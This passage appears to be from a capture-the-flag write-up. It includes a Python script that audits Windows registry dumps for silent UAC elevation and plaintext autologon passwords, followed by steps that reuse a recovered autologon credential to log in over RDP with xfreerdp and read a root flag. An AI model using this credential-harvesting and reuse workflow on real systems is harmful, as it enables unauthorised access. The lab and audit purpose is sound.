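        findings.append(("silent_elevation",
                         "ConsentPromptBehaviorAdmin=0: elevation happens without any prompt"))
    return findings


def audit_autologon(values: RegValues) -> List[Finding]:
    """Findings for the Winlogon key. The password itself is never included in a message."""
    findings: List[Finding] = []
    auto_on = values.get("AutoAdminLogon", ("REG_SZ", "0"))[1] == "1"
    user = values.get("DefaultUserName", ("REG_SZ", "?"))[1]
    has_pw = bool(values.get("DefaultPassword", ("REG_SZ", ""))[1])
    if auto_on and has_pw:
        findings.append(("autologon_plaintext_password",
                         f"AutoAdminLogon=1 for '{user}' with DefaultPassword in the registry, readable "
                         "by any local user; move it to an LSA secret (Sysinternals Autologon) or disable autologon"))
    elif auto_on:
        findings.append(("autologon_enabled",
                         f"AutoAdminLogon=1 for '{user}'; password not in the registry "
                         "(probably an LSA secret, still recoverable by a local administrator)"))
    elif has_pw:
        findings.append(("stale_default_password",
                         f"DefaultPassword is set for '{user}' although autologon is off; remove it"))
    return findings


# Constructed from the page's `reg query` output; the password value is made up.
SAMPLE_SYSTEM_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    EnableLUA    REG_DWORD    0x1
"""
SAMPLE_WINLOGON_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    hugo
    DefaultPassword    REG_SZ    Sample-Pa55word
    AutoLogonSID    REG_SZ    S-1-5-21-1966530601-3185510712-10604624-1008
    LastUsedUsername    REG_SZ    hugo
"""


def run_audit() -> Dict[str, List[Finding]]:
    """Audit both sample key dumps and return the findings per area."""
    return {"uac": audit_uac(parse_reg_query(SAMPLE_SYSTEM_KEY)),
            "autologon": audit_autologon(parse_reg_query(SAMPLE_WINLOGON_KEY))}


if __name__ == "__main__":
    for area, findings in run_audit().items():
        print(f"[{area}] {'no findings' if not findings else ''}")
        for fid, msg in findings:
            print(f"  {fid}: {msg}")
```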

Now we simply connect with RDP.

sudo xfreerdp /u:hugo /p:[REDACTED] /cert:ignore /v:10.10.10.22 /dynamic-resolution

Now we have successfully connected via RDP.

When we try to access the Administrator folder we get a UAC prompt; we simply click Continue and can then read our root flag.
